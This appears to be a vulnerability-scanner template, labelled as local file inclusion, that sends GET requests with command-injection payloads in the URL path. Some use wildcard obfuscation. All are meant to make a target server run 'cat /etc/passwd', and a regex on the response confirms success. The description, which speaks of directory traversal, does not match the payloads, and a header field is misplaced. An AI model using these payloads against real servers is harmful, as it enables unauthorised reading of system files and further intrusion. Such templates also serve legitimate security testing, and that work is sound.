id: Basic-lfi6

info:
  name: Local File Inclusion
  author: pelo
  severity: high
  description: |
     directory traversal via the GET /.. substring.

  tags: lfi,url-lfi

requests:
  - method: GET
    path:
      - "{{BaseURL}}/;+$u+cat+/etc$u/passwd$u"
      - "{{BaseURL}}/;+$u+cat+/etc$u/passwd+/#"
      - "{{BaseURL}}/???/??t+/???/??ss??"
      - "{{BaseURL}}/?in/cat+/et?/passw?"
    headers:
     User-Agent: "Mozila/5.0 (x11; Linux x86_x64) AppleWebkit/537.36 (KHTML, like gecko) chrome/87.0.4280.67 Safari"
     stop-at-first-match: true
    matchers:
      - type: regex
        part: body
        regex:
          - "root:[x*]:0:0"

